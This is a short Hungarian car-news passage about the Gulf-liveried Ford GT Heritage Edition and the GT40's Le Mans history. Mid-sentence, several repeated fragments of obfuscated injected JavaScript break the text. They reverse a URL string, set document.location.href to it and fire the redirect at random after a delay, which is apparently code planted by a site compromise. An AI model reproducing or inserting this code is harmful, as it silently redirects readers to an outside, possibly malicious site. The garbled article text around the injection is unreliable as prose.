Sokáik domináltak Enzo Ferrari versenyautói a Le Mans-i futamokon és ezt a sorozatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot szerette volna megtörni a Ford, ezért megalkották a GT40-est, mellyel aztán négyszer nyerték meg a 24 órán keresztül tartó versengést. Mindez 1966 és 1969 között történt és már tavaly is előrukkoltak egy Heritage Edition GT-vel, melyet piros és fehér fényezéséről ismerhetnek fel. Idén a Gulf Oil színeibe öltöztetett darabot alkották meg. A narancssárga és halvány kék fényezésen túl 9-es rajtszámot kapott, 20 colos kovácsolt alufelniken gurul és karbon borítású tetőoszlopokat kapott. A belterét fekete bőr és alcantara borítja, melyet karbon betétekkel egészítettek ki, csupán a külsővel harmonizáló varrások…
- Hirdetés -